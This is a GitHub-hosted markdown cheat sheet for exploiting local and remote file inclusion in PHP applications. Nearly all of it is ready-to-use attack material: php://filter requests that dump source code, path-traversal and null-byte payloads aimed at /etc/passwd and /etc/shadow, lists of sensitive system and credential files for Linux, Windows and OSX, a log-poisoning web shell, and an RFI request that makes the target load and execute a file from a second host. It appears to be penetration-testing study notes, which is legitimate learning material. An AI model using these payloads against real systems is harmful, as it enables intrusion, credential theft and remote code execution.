Skip to content

Latest commit

 

History

History
134 lines (79 loc) · 2.76 KB

file_inclusion_vulnerabilities.md

File metadata and controls

134 lines (79 loc) · 2.76 KB
Raw

File Inclusion Vulnerabilities

  • fimap

There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI): (https://github.com/kurobeats/fimap)

  • **Gaining a shell from phpinfo()  **fimap + phpinfo() Exploit

  If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.

  • For Local File Inclusions look for the include() function in PHP code.
include("lang/".$\_COOKIE\['lang'\]);

include($\_GET\['page'\].".php");
  • LFI - Encode and Decode a file using base64
curl -s \

"http://$ip/?page=<php://filter/convert.base64-encode/resource=index>" \

| grep -e '\\[^\\ \\]\\{40,\\}' | base64 -d
  • LFI - Download file with base 64 encoding
http://$ip/index.php?page=<php://filter/convert.base64-encode/resource=admin.php>
  • LFI Linux Files:
/etc/issue

/proc/version

/etc/profile

/etc/passwd

/etc/passwd

/etc/shadow

/root/.bash_history

/var/log/dmessage

/var/mail/root

/var/spool/cron/crontabs/root
  • LFI Windows Files:
%SYSTEMROOT%\\repair\\system

%SYSTEMROOT%\\repair\\SAM

%SYSTEMROOT%\\repair\\SAM

%WINDIR%\\win.ini

%SYSTEMDRIVE%\\boot.ini

%WINDIR%\\Panther\\sysprep.inf

%WINDIR%\\system32\\config\\AppEvent.Evt
  • LFI OSX Files:
/etc/fstab

/etc/master.passwd

/etc/resolv.conf

/etc/sudoers

/etc/sysctl.conf
  • LFI - Download passwords file
http://$ip/index.php?page=/etc/passwd

http://$ip/index.php?file=../../../../etc/passwd
  • LFI - Download passwords file with filter evasion
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
  • Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
  • Contaminating Log Files
<?php echo shell\_exec($\_GET\['cmd'\]);?>

  • For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files

  • /etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"

include($\_REQUEST\["file"\].".php");

Remote File Inclusion

http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt  

<?php echo shell_exec("ipconfig");?>